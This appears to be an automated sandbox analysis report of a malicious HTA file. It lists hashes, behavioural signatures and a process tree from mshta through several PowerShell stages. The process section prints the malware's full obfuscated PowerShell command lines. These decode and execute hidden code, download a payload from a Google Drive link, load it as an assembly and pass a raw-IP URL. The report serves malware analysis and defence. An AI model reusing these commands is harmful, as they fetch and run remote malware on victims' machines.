Analysis
max time kernel: 119s
max time network: 121s
platform: windows7_x64
resource: win7-20241023-en
resource tags: arch:x64, arch:x86, image:win7-20241023-en, locale:en-us, os:windows7-x64, system
submitted: 29-10-2024 12:17
Static task: static1
Behavioral task: behavioral1
  Sample: goodthingstoapprovethebestwaytounderstandhowmuchgood.hta
  Resource: win7-20241023-en
Behavioral task: behavioral2
  Sample: goodthingstoapprovethebestwaytounderstandhowmuchgood.hta
  Resource: win10v2004-20241007-en
General
Target: goodthingstoapprovethebestwaytounderstandhowmuchgood.hta
Size: 131KB
MD5: c8cbdfd8a9cde5597983e48f8a9dff18
SHA1: df42a953a8f67e4bc41d8cb1cc9a707bd358617c
SHA256: 98423a9f9031d55d618d2b6247e6724a96264cc7f10a20fb35ee475fada464c7
SHA512: 18a54603e30fa03c6f6671a0d47eb7fe9942f7aefc038649222aa204561a3c50fe775c2c83c4d240757ef82fcbdaa4c86c8fe1e249c30abdd6bc76b16a8b4587
SSDEEP: 96:4vCt7Qm6c4rJAcUJrH6FE4/JCgfXjaPW8/85ScHtcYggzZbrUZcKqQ:4vCF3KrJ2rg3Ugy6rDQ
Malware Config
Extracted: https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures
Blocklisted process makes network request (3 IoCs)
  flow  pid   Process
  4     2636  poWERsHELl.eXe
  6     1808  powershell.exe
  8     1808  powershell.exe
Command and Scripting Interpreter: PowerShell (1 TTPs, 2 IoCs)
Run Powershell and hide display window.
  pid   Process
  1656  powershell.exe
  1808  powershell.exe
Evasion via Device Credential Deployment (2 IoCs)
  pid   Process
  2840  powershell.exe
  2636  poWERsHELl.eXe
Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
  flow  ioc
  5     drive.google.com
  6     drive.google.com
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTPs, 8 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description  ioc                                                          Process
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  mshta.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  poWERsHELl.eXe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  csc.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cvtres.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  WScript.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
Modifies Internet Explorer settings
  description  ioc                                                                                                     Process
  Key created  \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main  mshta.exe
Suspicious behavior: EnumeratesProcesses (6 IoCs)
  pid   Process
  2636  poWERsHELl.eXe
  2840  powershell.exe
  2636  poWERsHELl.eXe
  2636  poWERsHELl.eXe
  1656  powershell.exe
  1808  powershell.exe
Suspicious use of AdjustPrivilegeToken (4 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  2636  poWERsHELl.eXe
  Token: SeDebugPrivilege  2840  powershell.exe
  Token: SeDebugPrivilege  1656  powershell.exe
  Token: SeDebugPrivilege  1808  powershell.exe
Suspicious use of WriteProcessMemory (28 IoCs; each row below was recorded 4 times)
  description                       pid   Process         procid_target
  PID 2404 wrote to memory of 2636  2404  mshta.exe       30
  PID 2636 wrote to memory of 2840  2636  poWERsHELl.eXe  32
  PID 2636 wrote to memory of 2864  2636  poWERsHELl.eXe  33
  PID 2864 wrote to memory of 2148  2864  csc.exe         34
  PID 2636 wrote to memory of 2364  2636  poWERsHELl.eXe  36
  PID 2364 wrote to memory of 1656  2364  WScript.exe     37
  PID 1656 wrote to memory of 1808  1656  powershell.exe  39
Processes
[1] C:\Windows\SysWOW64\mshta.exe (PID 2404)
    Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\goodthingstoapprovethebestwaytounderstandhowmuchgood.hta"
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\SysWOW64\WindowSpOwERshelL\v1.0\poWERsHELl.eXe (PID 2636)
      Command line: "C:\Windows\SystEm32\WindowSpOwERshelL\v1.0\poWERsHELl.eXe" "POwersHell -EX bYPaSs -nop -W 1 -C DEVicECRedENtiAlDepLOyMEnT ; iex($(iEx('[sYsTeM.teXt.ENCOdinG]'+[ChaR]0X3a+[chAr]58+'UTF8.gETsTrINg([sySteM.cONVErt]'+[ChAr]58+[chaR]58+'fRombaSe64STRiNg('+[cHAr]0x22+'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'+[ChAr]0X22+'))')))"
      - Blocklisted process makes network request
      - Evasion via Device Credential Deployment
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2840)
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPaSs -nop -W 1 -C DEVicECRedENtiAlDepLOyMEnT
        - Evasion via Device Credential Deployment
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe (PID 2864)
        Command line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vx5j-siy.cmdline"
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe (PID 2148)
          Command line: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9D88.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC9D87.tmp"
          - System Location Discovery: System Language Discovery

    [3] C:\Windows\SysWOW64\WScript.exe (PID 2364)
        Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\uthinkiamthegoodthingsforugivenmebestthingstod.vbS"
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1656)
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          - Command and Scripting Interpreter: PowerShell
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory

        [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1808)
            Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('7vYimageUrl = w2Phttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur w2P;7vYwebClient = New-Object System.Net.We'+'bClient;7vYimageBytes = 7vYwebClient.DownloadData(7vYimageUrl);7vY'+'ima'+'geText = [System.Text.Encoding]::UTF8.GetString'+'(7vYimageBytes);7vYstart'+'Flag = w2P<<BASE64_START>>w2P;'+'7vYendFlag = w2P<<BASE'+'64_END>>w2P;7vYstartIndex = 7vYimageText.IndexOf(7vYstartFla'+'g);7vYendIndex = 7vYimageText.IndexOf(7vYendFlag);7vYstartIndex -ge 0 -and 7vYendIndex -gt 7vYstartIndex;7vYstartIn'+'dex += 7vYstartFlag.Len'+'gt'+'h;7vYbase64Length = 7vYendIndex - 7vYstartIndex;7vYbase64Command = 7vYimageText.Substring(7vYstartIndex, 7vYbase64Length);7vYbase64Reversed = -join (7vYbase64Command.ToCharArray() jGw ForEach-Object { 7vY_ })[-1..-(7vYbase64Command.Length)];7vYcommandBytes = [System.Co'+'nvert]::F'+'romBase64St'+'ring(7vYbase64Reversed);7vYloadedAssembly = [System.Reflection.Assemb'+'ly]::Load(7vYcomma'+'ndBytes);7vYvaiMethod = [dnlib.IO.Home].GetMethod(w2PVAIw2P);7vYvaiMetho'+'d.Invoke(7vYnull, @(w2Ptxt.SGOLKL/213/551.871.64.891//:ptthw2P, w2'+'Pdesativadow2P, w2Pdesativadow2P, w2Pde'+'sativadow2P,'+' w2Paspnet_regb'+'rowsersw2P, w2Pdesativadow2P, w2Pdesativadow2P,w2Pdesativadow2P,w2Pdesativadow2P,w2Pdes'+'ativadow2P,w2Pdesativadow2P,w2Pdesa'+'tiv'+'adow'+'2P,w2P1w2P,w2Pdesativadow2P));') -CrEPlAce([cHaR]119+[cHaR]50+[cHaR]80),[cHaR]39 -rEplAce '7vY',[cHaR]36-rEplAce'jGw',[cHaR]124) | & ( $psHoME[21]+$psHoME[30]+'X')"
            - Blocklisted process makes network request
            - Command and Scripting Interpreter: PowerShell
            - System Location Discovery: System Language Discovery
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads